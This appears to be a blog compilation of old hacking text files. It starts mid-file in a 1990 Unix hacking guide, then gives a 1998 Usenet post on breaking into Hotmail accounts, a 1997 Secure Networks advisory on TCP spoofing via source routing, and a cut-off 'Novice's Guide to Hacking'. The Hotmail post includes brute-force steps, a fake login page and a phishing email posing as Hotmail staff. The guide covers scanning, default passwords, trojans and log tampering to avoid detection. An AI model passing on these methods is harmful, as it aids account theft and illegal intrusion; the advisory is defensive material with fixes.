happen ALL to many times, and it is always the same story...
The VAR is out for a fast buck, so they set up the software (all they know
how to do), and install any software packages ordered with it (following
the step by step instructions). Then they turn it over to the business
who runs a word processor, or database, or something, un aware that a
"shell" or command line exists, and they probably don't even know root does.
So, we will see more and more of these pop up, especially since AT&T is
now bundling a version of Xwindows with their new System V, and Simultask...
which will lead to even more holes. You'll find systems local to you
that are easy as hell to get into, and you'll see what I mean. These
VARs are really actually working for us. If a security problem arises
that the business is aware of, they call the VAR to fix it... Of course,
the Var gets paid by the hour, and leaves something open so you'll get in
again, and they make more moolahhhh.

You can use this phile for whatever you want. I can't stop you. Just
to learn unix (heh) or whatever. But its YOUR ass if you get caught.
Always consider the penalties before you attempt something. Sometimes
it is not worth it, Sometimes it is.

This phile was not meant to be comprehensive, even though it may seem like
it. I have left out a LOT of techniques, and quirks, specifically to get
you to learn SOMETHING on your own, and also to retain information so
I will have some secrets. You may pass this file on, UNMODIFIED, to any
GOOD H/P BBS. Sysops can add things to the archieve to say where
it was DL'd from, or to the text viewer for the same purpose. This is
Copywrited (haha) by Sir Hackalot, and by PHAZE, in the year 1990.

-Sir Hackalot of PHAZE
1990.

A Small Guide to Hacking HOTMAIL

2009-11-03T02:22:00.001-08:00

From hacker@mitchell.demon.nl Mon Mar 02 20:09:04 1998
Newsgroups: alt.hacking
Subject: Hotmail Hack info !
From: Terry Mitchell
Date: Mon, 02 Mar 1998 12:09:04 -0800

HOTMAIL HACKING INFO.

I_1_I - Brute force hacking
a. Use telnet to connect to port 110 (Hotmail´s pop-server)
b. Type USER and then the victim´s username
c. Type PASS and then the guess a password
d. Repeat that until U have found the correct password.
!. This is called brute force hacking and requires patience.
It´s better than trying to guess the victims password on
hotmail homepage only because it´s faster.
____
I_2_I - The Best way
a. Get the username of the victim (It usually stands in the adress-field
)
b. Then type " www.hotmail.com/cgi-bin/start/victimsusername "
c. U´re in!
!. This hack only work if U are on the same network or computer as the
victim and if he don´t log out.
____
I_3_I - The old way
a. Go to http://www.hotmail/proxy.html
b. Now type the victims username. (press login)
c. Look at the source code.
d. On the fifth row U should find "action=someadress"
e. Copy that adress and paste it into the adress-field
f. You are in...
!. As you can see it´s a long procedure and the victim have
plenty of time to log out.
____
I_4_I - Another...
a. Go to hotmail´s homepage
b. Copy the source code.
c. Make a new html file with the same code but change method=post to
method=enter
d. "view" the page
e. Change the adress to www.hotmail.com/ (don´t press enter!)
f. Make the victim type in his username and password
g. Look in the adress-field. There you´ll see ...&password:something...
!. This is the way I use, because it lets you know the password.
(If he exits the browser U can see the password in the History folder!)

READ!
Hotmail´s sysops have changed the "system" so that the victim may log
out even
if U are inside his/her account. So don´t waste U´r time!

---

So you want to get some hotmail passwords?
This is pretty easy to do once you have got the hang of it.
If you are a beginner, I wouldn't make this your first attempt at
hacking. When you need to do is use a port surfer and surf over to
port 80. While there, you have to try and mail the user that you
want the password from. It is best to mail them using the words
"We" and "Here at Hotmail..." Most suckers fall for this and end
up giving out their password. There is another way to also, you can
get an anon mailer, and forge the addres as staff@hotmail.com. But
you have to change the reply address to go to a different addres
like user@host.com. The person that you are trying to get the pass
from MUST respond to that letter for the mail to be forwarded to you.
Have text like "Please reply to this letter with the subject "PASSWORD"
and underneith please include your user name and password.
If you have trouble Loging in withing the next few days, this is
only because we are updating our mail servers but no need to worry,
your mail will still be there. Even though the server may be down
for an hour. From the staff at Hotmail, Thank You."

A simple TCP spoofing attack

2009-11-03T02:21:00.000-08:00

A simple TCP spoofing attack

Over the past few years TCP sequence number prediction attacks have become a
real threat against unprotected networks, taking advantage of the inherent
trust relationships present in many network installations. TCP sequence
number prediction attacks have most commonly been implemented by opening a
series of connections to the target host, and attempting to predict the
sequence number which will be used next. Many operating systems have
therefore attempted to solve this problem by implementing a method of
generating sequence numbers in unpredictable fashions. This method does
not solve the problem.

This advisory introduces an alternative method of obtaining the initial
sequence number from some common trusted services. The attack presented here
does not require the attacker to open multiple connections, or flood a port
on the trusted host to complete the attack. The only requirement is that
source routed packets can be injected into the target network with fake
source addresses.

This advisory assumes that the reader already has an understanding of how
TCP sequence number prediction attacks are implemented.

The impact of this advisory is greatly diminished due to the large number of
organizations which block source routed packets and packets with addresses
inside of their networks. Therefore we present the information as more of
a 'heads up' message for the technically inclined, and to re-iterate that
the randomization of TCP sequence numbers is not an effective solution
against this attack.

Technical Details
~~~~~~~~~~~~~~~~~

The problem occurs when particular network daemons accept connections
with source routing enabled, and proceed to disable any source routing
options on the connection. The connection is allowed to continue, however
the reverse route is no longer used. An example attack can launched against
the in.rshd daemon, which on most systems will retrieve the socket options
via getsockopt() and then turn off any dangerous options via setsockopt().

An example attack follows.

Host A is the trusted host
Host B is the target host
Host C is the attacker

Host C initiates a source routed connection to in.rshd on host B, pretending
to be host A.

Host C spoofing Host A --> Host B in.rshd

Host B receives the initial SYN packet, creates a new PCB (protocol
control block) and associates the route with the PCB. Host B responds,
using the reverse route, sending back a SYN/ACK with the sequence number.

Host C spoofing Host A <-- Host B in.rshd

Host C responds, still spoofing host A, acknowledging the sequence number.
Source routing options are not required on this packet.

Host C spoofing Host A --> Host B in.rshd

We now have an established connection, the accept() call completes, and
control is now passed to the in.rshd daemon. The daemon now does IP
options checking and determines that we have initiated a source routed
connection. The daemon now turns off this option, and any packets sent
thereafter will be sent to the real host A, no longer using the reverse
route which we have specified. Normally this would be safe, however the
attacking host now knows what the next sequence number will be. Knowing
this sequence number, we can now send a spoofed packet without the source
routing options enabled, pretending to originate from Host A, and our
command will be executed.

In some conditions the flooding of a port on the real host A is required
if larger ammounts of data are sent, to prevent the real host A from
responding with an RST. This is not required in most cases when performing
this attack against in.rshd due to the small ammount of data transmitted.

It should be noted that the sequence number is obtained before accept()
has returned and that this cannot be prevented without turning off source
routing in the kernel.

As a side note, we're very lucky that TCP only associates a source route with
a PCB when the initial SYN is received. If it accepted and changed the ip
options at any point during a connection, more exotic attacks may be possible.
These could include hijacking connections across the internet without playing
a man in the middle attack and being able to bypass IP options checking
imposed by daemons using getsockopt(). Luckily *BSD based TCP/IP stacks will
not do this, however it would be interesting to examine other implementations.

Impact
~~~~~~

The impact of this attack is similar to the more complex TCP sequence
number prediction attack, yet it involves fewer steps, and does not require
us to 'guess' the sequence number. This allows an attacker to execute
arbitrary commands as root, depending on the configuration of the target
system. It is required that trust is present here, as an example, the use
of .rhosts or hosts.equiv files.

Solutions
~~~~~~~~~

The ideal solution to this problem is to have any services which rely on
IP based authentication drop the connection completely when initially
detecting that source routed options are present. Network administrators
and users can take precautions to prevent users outside of their network
from taking advantage of this problem. The solutions are hopefully already
either implemented or being implemented.

1. Block any source routed connections into your networks
2. Block any packets with internal based address from entering your network.

Network administrators should be aware that these attacks can easily be
launched from behind filtering routers and firewalls. Internet service
providers and corporations should ensure that internal users cannot launch
the described attacks. The precautions suggested above should be implemented
to protect internal networks.

Example code to correctly process source routed packets is presented here
as an example. Please let us know if there are any problems with it.
This code has been tested on BSD based operating systems.

u_char optbuf[BUFSIZ/3];
int optsize = sizeof(optbuf), ipproto, i;
struct protoent *ip;

if ((ip = getprotobyname("ip")) != NULL)
ipproto = ip->p_proto;
else
ipproto = IPPROTO_IP;
if (!getsockopt(0, ipproto, IP_OPTIONS, (char *)optbuf, &optsize) &&
optsize != 0) {
for (i = 0; i < optsize; ) {
u_char c = optbuf[i];
if (c == IPOPT_LSRR || c == IPOPT_SSRR)
exit(1);
if (c == IPOPT_EOL)
break;
i += (c == IPOPT_NOP) ? 1 : optbuf[i+1];
}
}

One critical concern is in the case where TCP wrappers are being used. If
a user is relying on TCP wrappers, the above fix should be incorporated into
fix_options.c. The problem being that TCP wrappers itself does not close
the connection, however removes the options via setsockopt(). In this case
when control is passed to in.rshd, it will never see any options present,
and the connection will remain open (even if in.rshd has the above patch
incorporated). An option to completely drop source routed connections will
hopefully be provided in the next release of TCP wrappers. The other option
is to undefine KILL_IP_OPTIONS, which appears to be undefined by default.
This passes through IP options and allows the called daemon to handle them
accordingly.

Disabling Source Routing
~~~~~~~~~~~~~~~~~~~~~~~~

We believe the following information to be accurate, however it is not
guaranteed.

--- Cisco

To have the router discard any datagram containing an IP source route option
issue the following command:

no ip source-route

This is a global configuration option.

--- NetBSD

Versions of NetBSD prior to 1.2 did not provide the capability for disabling
source routing. Other versions ship with source routing ENABLED by default.
We do not know of a way to prevent NetBSD from accepting source routed packets.
NetBSD systems, however, can be configured to prevent the forwarding of packets
when acting as a gateway.

To determine whether forwarding of source routed packets is enabled,
issue the following command:

# sysctl net.inet.ip.forwarding
# sysctl net.inet.ip.forwsrcrt

The response will be either 0 or 1, 0 meaning off, and 1 meaning it is on.

Forwarding of source routed packets can be turned off via:

# sysctl -w net.inet.ip.forwsrcrt=0

Forwarding of all packets in general can turned off via:

# sysctl -w net.inet.ip.forwarding=0

--- BSD/OS

BSDI has made a patch availible for rshd, rlogind, tcpd and nfsd. This
patch is availible at:

ftp://ftp.bsdi.com/bsdi/patches/patches-2.1

OR via their patches email server

The patch number is
U210-037 (normal version)
D210-037 (domestic version for sites running kerberized version)

BSD/OS 2.1 has source routing disabled by default

Previous versions ship with source routing ENABLED by default. As far as
we know, BSD/OS cannot be configured to drop source routed packets destined
for itself, however can be configured to prevent the forwarding of such
packets when acting as a gateway.

To determine whether forwarding of source routed packets is enabled,
issue the following command:

# sysctl net.inet.ip.forwarding
# sysctl net.inet.ip.forwsrcrt

The response will be either 0 or 1, 0 meaning off, and 1 meaning it is on.

Forwarding of source routed packets can be turned off via:

# sysctl -w net.inet.ip.forwsrcrt=0

Forwarding of all packets in general can turned off via:

# sysctl -w net.inet.ip.forwarding=0

--- OpenBSD

Ships with source routing turned off by default. To determine whether source
routing is enabled, the following command can be issued:

# sysctl net.inet.ip.sourceroute

The response will be either 0 or 1, 0 meaning that source routing is off,
and 1 meaning it is on. If source routing has been turned on, turn off via:

# sysctl -w net.inet.ip.sourceroute=0

This will prevent OpenBSD from forwarding and accepting any source routed
packets.

--- FreeBSD

Ships with source routing turned off by default. To determine whether source
routing is enabled, the following command can be issued:

# sysctl net.inet.ip.sourceroute

The response will be either 0 or 1, 0 meaning that source routing is off,
and 1 meaning it is on. If source routing has been turned on, turn off via:

# sysctl -w net.inet.ip.sourceroute=0

--- Linux

Linux by default has source routing disabled in the kernel.

--- Solaris 2.x

Ships with source routing enabled by default. Solaris 2.5.1 is one of the
few commercial operating systems that does have unpredictable sequence
numbers, which does not help in this attack.

We know of no method to prevent Solaris from accepting source routed
connections, however, Solaris systems acting as gateways can be prevented
from forwarding any source routed packets via the following commands:

# ndd -set /dev/ip ip_forward_src_routed 0

You can prevent forwarding of all packets via:

# ndd -set /dev/ip ip_forwarding 0

These commands can be added to /etc/rc2.d/S69inet to take effect at bootup.

--- SunOS 4.x

We know of no method to prevent SunOS from accepting source routed
connections, however a patch is availible to prevent SunOS systems from
forwarding source routed packets.

This patch is availible at:

ftp://ftp.secnet.com/pub/patches/source-routing-patch.tar.gz

To configure SunOS to prevent forwarding of all packets, the following
command can be issued:

# echo "ip_forwarding/w 0" | adb -k -w /vmunix /dev/mem
# echo "ip_forwarding?w 0" | adb -k -w /vmunix /dev/mem

The first command turns off packet forwarding in /dev/mem, the second in
/vmunix.

--- HP-UX

HP-UX does not appear to have options for configuring an HP-UX system to
prevent accepting or forwarding of source routed packets. HP-UX has IP
forwarding turned on by default and should be turned off if acting as a
firewall. To determine whether IP forwarding is currently on, the following
command can be issued:

# adb /hp-ux
ipforwarding?X <- user input
ipforwarding:
ipforwarding: 1
#

A response of 1 indicates IP forwarding is ON, 0 indicates off. HP-UX can
be configured to prevent the forwarding of any packets via the following
commands:

# adb -w /hp-ux /dev/kmem
ipforwarding/W 0
ipforwarding?W 0
^D
#

--- AIX

AIX cannot be configured to discard source routed packets destined for itself,
however can be configured to prevent the forwarding of source routed packets.
IP forwarding and forwarding of source routed packets specifically can be
turned off under AIX via the following commands:

To turn off forwarding of all packets:

# /usr/sbin/no -o ipforwarding=0

To turn off forwarding of source routed packets:

# /usr/sbin/no -o nonlocsrcroute=0

Note that these commands should be added to /etc/rc.net

If shutting off source routing is not possible and you are still using
services which rely on IP address authentication, they should be disabled
immediately (in.rshd, in.rlogind). in.rlogind is safe if .rhosts and
/etc/hosts.equiv are not used.

Attributions
~~~~~~~~~~~~

Thanks to Niels Provos for providing
the information and details of this attack. You can view his web
site at http://www.physnet.uni-hamburg.de/provos

Thanks to Theo de Raadt, the maintainer of OpenBSD for forwarding this
information to us. More information on OpenBSD can be found at
http://www.openbsd.org

Thanks to Keith Bostic for discussion and a quick
solution for BSD/OS.

Thanks to Brad Powell for providing information
for Solaris 2.x and SunOS 4.x operating systems.

Thanks go to CERT and AUSCERT for recommendations in this advisory.

You can contact the author of this advisory at oliver@secnet.com

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3ia

mQCNAzJATn0AAAEEAJeGbZyoCw14fCoAMeBRKiZ3L6JMbd9f4BtwdtYTwD42/Uz1
A/4UiRJzRLGhARpt1J06NVQEKXQDbejxGIGzAGTcyqUCKH6yNAncqoep3+PKIQJd
Kd23buvbk7yUgyVlqQHDDsW0zMKdlSO7rYByT6zsW0Rv5JmHJh/bLKAOe7p9AAUR
tCVPbGl2ZXIgRnJpZWRyaWNocyA8b2xpdmVyQHNlY25ldC5jb20+iQCVAwUQMkBO
fR/bLKAOe7p9AQEBOAQAkTXiBzf4a31cYYDFmiLWgXq0amQ2lsamdrQohIMEDXe8
45SoGwBzXHVh+gnXCQF2zLxaucKLG3SXPIg+nJWhFczX2Fo97HqdtFmx0Y5IyMgU
qRgK/j8KyJRdVliM1IkX8rf3Bn+ha3xn0yrWlTZMF9nL7iVPBsmgyMOuXwZ7ZB8=
=xq4f
-----END PGP PUBLIC KEY BLOCK-----

Copyright Notice
~~~~~~~~~~~~~~~~
The contents of this advisory are Copyright (C) 1997 Secure Networks Inc,
and may be distributed freely provided that no fee is charged for
distribution, and that proper credit is given.

You can find Secure Networks papers at ftp://ftp.secnet.com/pub/papers
and advisories at ftp://ftp.secnet.com/advisories

You can browse our web site at http://www.secnet.com

You can subscribe to our security advisory mailing list by sending mail to
majordomo@secnet.com with the line "subscribe sni-advisories"

नोविस गाइड तो हच्किंग पार्ट 2

2009-11-03T02:18:00.002-08:00

+++++++++++++++++++++++++++++++++++++++++++++++++
| The LOD/H Presents |
++++++++++++++++ ++++++++++++++++
\ A Novice's Guide to Hacking- 2004 edition /
\ ========================================= /
\ by /
\ The Mentor /
\ Legion of Doom/Legion of Hackers /
\ /
\ December, 2004 /
\ Merry Christmas Everyone! /
\+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++/

**********************************************************************
| The author hereby grants permission to reproduce, redistribute, |
| or include this file in your g-file section, electronic or print |
| newletter, or any other form of transmission that you choose, as |
| long as it is kept intact and whole, with no ommissions, delet- |
| ions, or changes. (C) The Mentor- Phoenix Project Productions |
| 2003,2004 XXX/XXX-XXXX |
**********************************************************************

Introduction: The State of the Hack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
After surveying a rather large g-file collection, my attention was drawn to
the fact that there hasn't been a good introductory file written for absolute
beginners since back when Mark Tabas was cranking them out (and almost
*everyone* was a beginner!) The Arts of Hacking and Phreaking have changed
radically since that time, and as the 90's approach, the hack/phreak community
has recovered from the Summer '87 busts (just like it recovered from the Fall
'85 busts, and like it will always recover from attempts to shut it down), and
the progressive media (from Reality Hackers magazine to William Gibson and
Bruce Sterling's cyberpunk fables of hackerdom) is starting to take notice
of us for the first time in recent years in a positive light.
Unfortunately, it has also gotten more dangerous since the early 80's.
Phone cops have more resources, more awareness, and more intelligence that they
exhibited in the past. It is becoming more and more difficult to survive as
a hacker long enough to become skilled in the art. To this end this file
is dedicated . If it can help someone get started, and help them survive
to discover new systems and new information, it will have served it's purpose,
and served as a partial repayment to all the people who helped me out when I
was a beginner.

Contents
~~~~~~~~
This file will be divided into four parts:
Part 1: What is Hacking, A Hacker's Code of Ethics, Basic Hacking Safety
Part 2: Packet Switching Networks: Telenet- How it Works, How to Use it,
Outdials, Network Servers, Private PADs
Part 3: Identifying a Computer, How to Hack In, Operating System
Defaults
Part 4: Conclusion- Final Thoughts, Books to Read, Boards to Call,
Acknowledgements

Part One: The Basics
~~~~~~~~~~~~~~~~~~~~
As long as there have been computers, there have been hackers. In the 50's
at the Massachusets Institute of Technology (MIT), students devoted much time
and energy to ingenious exploration of the computers. Rules and the law were
disregarded in their pursuit for the 'hack'. Just as they were enthralled with
their pursuit of information, so are we. The thrill of the hack is not in
breaking the law, it's in the pursuit and capture of knowledge.
To this end, let me contribute my suggestions for guidelines to follow to
ensure that not only you stay out of trouble, but you pursue your craft without
damaging the computers you hack into or the companies who own them.

I. Do not intentionally damage *any* system.
II. Do not alter any system files other than ones needed to ensure your
escape from detection and your future access (Trojan Horses, Altering
Logs, and the like are all necessary to your survival for as long as
possible.)
III. Do not leave your (or anyone else's) real name, real handle, or real
phone number on any system that you access illegally. They *can* and
will track you down from your handle!
IV. Be careful who you share information with. Feds are getting trickier.
Generally, if you don't know their voice phone number, name, and
occupation or haven't spoken with them voice on non-info trading
conversations, be wary.
V. Do not leave your real phone number to anyone you don't know. This
includes logging on boards, no matter how k-rad they seem. If you
don't know the sysop, leave a note telling some trustworthy people
that will validate you.
VI. Do not hack government computers. Yes, there are government systems
that are safe to hack, but they are few and far between. And the
government has inifitely more time and resources to track you down than
a company who has to make a profit and justify expenses.
VII. Don't use codes unless there is *NO* way around it (you don't have a
local telenet or tymnet outdial and can't connect to anything 800...)
You use codes long enough, you will get caught. Period.
VIII. Don't be afraid to be paranoid. Remember, you *are* breaking the law.
It doesn't hurt to store everything encrypted on your hard disk, or
keep your notes buried in the backyard or in the trunk of your car.
You may feel a little funny, but you'll feel a lot funnier when you
when you meet Bruno, your transvestite cellmate who axed his family to
death.
IX. Watch what you post on boards. Most of the really great hackers in the
country post *nothing* about the system they're currently working
except in the broadest sense (I'm working on a UNIX, or a COSMOS, or
something generic. Not "I'm hacking into General Electric's Voice Mail
System" or something inane and revealing like that.)
X. Don't be afraid to ask questions. That's what more experienced hackers
are for. Don't expect *everything* you ask to be answered, though.
There are some things (LMOS, for instance) that a begining hacker
shouldn't mess with. You'll either get caught, or screw it up for
others, or both.
XI. Finally, you have to actually hack. You can hang out on boards all you
want, and you can read all the text files in the world, but until you
actually start doing it, you'll never know what it's all about. There's
no thrill quite the same as getting into your first system (well, ok,
I can think of a couple of bigger thrills, but you get the picture.)

One of the safest places to start your hacking career is on a computer
system belonging to a college. University computers have notoriously lax
security, and are more used to hackers, as every college computer depart-
ment has one or two, so are less likely to press charges if you should
be detected. But the odds of them detecting you and having the personel to
committ to tracking you down are slim as long as you aren't destructive.
If you are already a college student, this is ideal, as you can legally
explore your computer system to your heart's desire, then go out and look
for similar systems that you can penetrate with confidence, as you're already
familar with them.
So if you just want to get your feet wet, call your local college. Many of
them will provide accounts for local residents at a nominal (under $20) charge.
Finally, if you get caught, stay quiet until you get a lawyer. Don't vol-
unteer any information, no matter what kind of 'deals' they offer you.
Nothing is binding unless you make the deal through your lawyer, so you might
as well shut up and wait.

Part Two: Networks
~~~~~~~~~~~~~~~~~~
The best place to begin hacking (other than a college) is on one of the
bigger networks such as Telenet. Why? First, there is a wide variety of
computers to choose from, from small Micro-Vaxen to huge Crays. Second, the
networks are fairly well documented. It's easier to find someone who can help
you with a problem off of Telenet than it is to find assistance concerning your
local college computer or high school machine. Third, the networks are safer.
Because of the enormous number of calls that are fielded every day by the big
networks, it is not financially practical to keep track of where every call and
connection are made from. It is also very easy to disguise your location using
the network, which makes your hobby much more secure.
Telenet has more computers hooked to it than any other system in the world
once you consider that from Telenet you have access to Tymnet, ItaPAC, JANET,
DATAPAC, SBDN, PandaNet, THEnet, and a whole host of other networks, all of
which you can connect to from your terminal.
The first step that you need to take is to identify your local dialup port.
This is done by dialing 1-800-424-9494 (1200 7E1) and connecting. It will
spout some garbage at you and then you'll get a prompt saying 'TERMINAL='.
This is your terminal type. If you have vt100 emulation, type it in now. Or
just hit return and it will default to dumb terminal mode.
You'll now get a prompt that looks like a @. From here, type @c mail
and then it will ask for a Username. Enter 'phones' for the username. When it
asks for a password, enter 'phones' again. From this point, it is menu
driven. Use this to locate your local dialup, and call it back locally. If
you don't have a local dialup, then use whatever means you wish to connect to
one long distance (more on this later.)
When you call your local dialup, you will once again go through the
TERMINAL= stuff, and once again you'll be presented with a @. This prompt lets
you know you are connected to a Telenet PAD. PAD stands for either Packet
Assembler/Disassembler (if you talk to an engineer), or Public Access Device
(if you talk to Telenet's marketing people.) The first description is more
correct.
Telenet works by taking the data you enter in on the PAD you dialed into,
bundling it into a 128 byte chunk (normally... this can be changed), and then
transmitting it at speeds ranging from 9600 to 19,200 baud to another PAD, who
then takes the data and hands it down to whatever computer or system it's
connected to. Basically, the PAD allows two computers that have different baud
rates or communication protocols to communicate with each other over a long
distance. Sometimes you'll notice a time lag in the remote machines response.
This is called PAD Delay, and is to be expected when you're sending data
through several different links.
What do you do with this PAD? You use it to connect to remote computer
systems by typing 'C' for connect and then the Network User Address (NUA) of
the system you want to go to.
An NUA takes the form of 031103130002520
\___/\___/\___/
| | |
| | |____ network address
| |_________ area prefix
|______________ DNIC

This is a summary of DNIC's (taken from Blade Runner's file on ItaPAC)
according to their country and network name.

DNIC Network Name Country DNIC Network Name Country
_______________________________________________________________________________
|
02041 Datanet 1 Netherlands | 03110 Telenet USA
02062 DCS Belgium | 03340 Telepac Mexico
02080 Transpac France | 03400 UDTS-Curacau Curacau
02284 Telepac Switzerland | 04251 Isranet Israel
02322 Datex-P Austria | 04401 DDX-P Japan
02329 Radaus Austria | 04408 Venus-P Japan
02342 PSS UK | 04501 Dacom-Net South Korea
02382 Datapak Denmark | 04542 Intelpak Singapore
02402 Datapak Sweden | 05052 Austpac Australia
02405 Telepak Sweden | 05053 Midas Australia
02442 Finpak Finland | 05252 Telepac Hong Kong
02624 Datex-P West Germany | 05301 Pacnet New Zealand
02704 Luxpac Luxembourg | 06550 Saponet South Africa
02724 Eirpak Ireland | 07240 Interdata Brazil
03020 Datapac Canada | 07241 Renpac Brazil
03028 Infogram Canada | 09000 Dialnet USA
03103 ITT/UDTS USA | 07421 Dompac French Guiana
03106 Tymnet USA |

There are two ways to find interesting addresses to connect to. The first
and easiest way is to obtain a copy of the LOD/H Telenet Directory from the
LOD/H Technical Journal #4 or 2600 Magazine. Jester Sluggo also put out a good
list of non-US addresses in Phrack Inc. Newsletter Issue 21. These files will
tell you the NUA, whether it will accept collect calls or not, what type of
computer system it is (if known) and who it belongs to (also if known.)
The second method of locating interesting addresses is to scan for them
manually. On Telenet, you do not have to enter the 03110 DNIC to connect to a
Telenet host. So if you saw that 031104120006140 had a VAX on it you wanted to
look at, you could type @c 412 614 (0's can be ignored most of the time.)
If this node allows collect billed connections, it will say 412 614
CONNECTED and then you'll possibly get an identifying header or just a
Username: prompt. If it doesn't allow collect connections, it will give you a
message such as 412 614 REFUSED COLLECT CONNECTION with some error codes out to
the right, and return you to the @ prompt.
There are two primary ways to get around the REFUSED COLLECT message. The
first is to use a Network User Id (NUI) to connect. An NUI is a username/pw
combination that acts like a charge account on Telenet. To collect to node
412 614 with NUI junk4248, password 525332, I'd type the following:
@c 412 614,junk4248,525332 <---- the 525332 will *not* be echoed to the
screen. The problem with NUI's is that they're hard to come by unless you're
a good social engineer with a thorough knowledge of Telenet (in which case
you probably aren't reading this section), or you have someone who can
provide you with them.
The second way to connect is to use a private PAD, either through an X.25
PAD or through something like Netlink off of a Prime computer (more on these
two below.)
The prefix in a Telenet NUA oftentimes (not always) refers to the phone Area
Code that the computer is located in (i.e. 713 xxx would be a computer in
Houston, Texas.) If there's a particular area you're interested in, (say,
New York City 914), you could begin by typing @c 914 001 . If it connects,
you make a note of it and go on to 914 002. You do this until you've found
some interesting systems to play with.
Not all systems are on a simple xxx yyy address. Some go out to four or
five digits (914 2354), and some have decimal or numeric extensions
(422 121A = 422 121.01). You have to play with them, and you never know what
you're going to find. To fully scan out a prefix would take ten million
attempts per prefix. For example, if I want to scan 512 completely, I'd have
to start with 512 00000.00 and go through 512 00000.99, then increment the
address by 1 and try 512 00001.00 through 512 00001.99. A lot of scanning.
There are plenty of neat computers to play with in a 3-digit scan, however,
so don't go berserk with the extensions.
Sometimes you'll attempt to connect and it will just be sitting there after
one or two minutes. In this case, you want to abort the connect attempt by
sending a hard break (this varies with different term programs, on Procomm,
it's ALT-B), and then when you get the @ prompt back, type 'D' for disconnect.
If you connect to a computer and wish to disconnect, you can type @
and you it should say TELENET and then give you the @ prompt. From there,
type D to disconnect or CONT to re-connect and continue your session
uninterrupted.

Outdials, Network Servers, and PADs
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
In addition to computers, an NUA may connect you to several other things.
One of the most useful is the outdial. An outdial is nothing more than a modem
you can get to over telenet- similar to the PC Pursuit concept, except that
these don't have passwords on them most of the time.
When you connect, you will get a message like 'Hayes 1200 baud outdial,
Detroit, MI', or 'VEN-TEL 212 Modem', or possibly 'Session 1234 established
on Modem 5588'. The best way to figure out the commands on these is to
type ? or H or HELP- this will get you all the information that you need to
use one.
Safety tip here- when you are hacking *any* system through a phone dialup,
always use an outdial or a diverter, especially if it is a local phone number
to you. More people get popped hacking on local computers than you can
imagine, Intra-LATA calls are the easiest things in the world to trace inexp-
ensively.
Another nice trick you can do with an outdial is use the redial or macro
function that many of them have. First thing you do when you connect is to
invoke the 'Redial Last Number' facility. This will dial the last number used,
which will be the one the person using it before you typed. Write down the
number, as no one would be calling a number without a computer on it. This
is a good way to find new systems to hack. Also, on a VENTEL modem, type 'D'
for Display and it will display the five numbers stored as macros in the
modem's memory.
There are also different types of servers for remote Local Area Networks
(LAN) that have many machine all over the office or the nation connected to
them. I'll discuss identifying these later in the computer ID section.
And finally, you may connect to something that says 'X.25 Communication
PAD' and then some more stuff, followed by a new @ prompt. This is a PAD
just like the one you are on, except that all attempted connections are billed
to the PAD, allowing you to connect to those nodes who earlier refused collect
connections.
This also has the added bonus of confusing where you are connecting from.
When a packet is transmitted from PAD to PAD, it contains a header that has
the location you're calling from. For instance, when you first connected
to Telenet, it might have said 212 44A CONNECTED if you called from the 212
area code. This means you were calling PAD number 44A in the 212 area.
That 21244A will be sent out in the header of all packets leaving the PAD.
Once you connect to a private PAD, however, all the packets going out
from *it* will have it's address on them, not yours. This can be a valuable
buffer between yourself and detection.

Phone Scanning
~~~~~~~~~~~~~~
Finally, there's the time-honored method of computer hunting that was made
famous among the non-hacker crowd by that Oh-So-Technically-Accurate movie
Wargames. You pick a three digit phone prefix in your area and dial every
number from 0000 --> 9999 in that prefix, making a note of all the carriers
you find. There is software available to do this for nearly every computer
in the world, so you don't have to do it by hand.

Part Three: I've Found a Computer, Now What?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This next section is applicable universally. It doesn't matter how you
found this computer, it could be through a network, or it could be from
carrier scanning your High School's phone prefix, you've got this prompt
this prompt, what the hell is it?
I'm *NOT* going to attempt to tell you what to do once you're inside of
any of these operating systems. Each one is worth several G-files in its
own right. I'm going to tell you how to identify and recognize certain
OpSystems, how to approach hacking into them, and how to deal with something
that you've never seen before and have know idea what it is.

VMS- The VAX computer is made by Digital Equipment Corporation (DEC),
and runs the VMS (Virtual Memory System) operating system.
VMS is characterized by the 'Username:' prompt. It will not tell
you if you've entered a valid username or not, and will disconnect
you after three bad login attempts. It also keeps track of all
failed login attempts and informs the owner of the account next time
s/he logs in how many bad login attempts were made on the account.
It is one of the most secure operating systems around from the
outside, but once you're in there are many things that you can do
to circumvent system security. The VAX also has the best set of
help files in the world. Just type HELP and read to your heart's
content.
Common Accounts/Defaults: [username: password [[,password]] ]
SYSTEM: OPERATOR or MANAGER or SYSTEM or SYSLIB
OPERATOR: OPERATOR
SYSTEST: UETP
SYSMAINT: SYSMAINT or SERVICE or DIGITAL
FIELD: FIELD or SERVICE
GUEST: GUEST or unpassworded
DEMO: DEMO or unpassworded
DECNET: DECNET

DEC-10- An earlier line of DEC computer equipment, running the TOPS-10
operating system. These machines are recognized by their
'.' prompt. The DEC-10/20 series are remarkably hacker-friendly,
allowing you to enter several important commands without ever
logging into the system. Accounts are in the format [xxx,yyy] where
xxx and yyy are integers. You can get a listing of the accounts and
the process names of everyone on the system before logging in with
the command .systat (for SYstem STATus). If you seen an account
that reads [234,1001] BOB JONES, it might be wise to try BOB or
JONES or both for a password on this account. To login, you type
.login xxx,yyy and then type the password when prompted for it.
The system will allow you unlimited tries at an account, and does
not keep records of bad login attempts. It will also inform you
if the UIC you're trying (UIC = User Identification Code, 1,2 for
example) is bad.
Common Accounts/Defaults:
1,2: SYSLIB or OPERATOR or MANAGER
2,7: MAINTAIN
5,30: GAMES

UNIX- There are dozens of different machines out there that run UNIX.
While some might argue it isn't the best operating system in the
world, it is certainly the most widely used. A UNIX system will
usually have a prompt like 'login:' in lower case. UNIX also
will give you unlimited shots at logging in (in most cases), and
there is usually no log kept of bad attempts.
Common Accounts/Defaults: (note that some systems are case
sensitive, so use lower case as a general rule. Also, many times
the accounts will be unpassworded, you'll just drop right in!)
root: root
admin: admin
sysadmin: sysadmin or admin
unix: unix
uucp: uucp
rje: rje
guest: guest
demo: demo
daemon: daemon
sysbin: sysbin

Prime- Prime computer company's mainframe running the Primos operating
system. The are easy to spot, as the greet you with
'Primecon 18.23.05' or the like, depending on the version of the
operating system you run into. There will usually be no prompt
offered, it will just look like it's sitting there. At this point,
type 'login '. If it is a pre-18.00.00 version of Primos,
you can hit a bunch of ^C's for the password and you'll drop in.
Unfortunately, most people are running versions 19+. Primos also
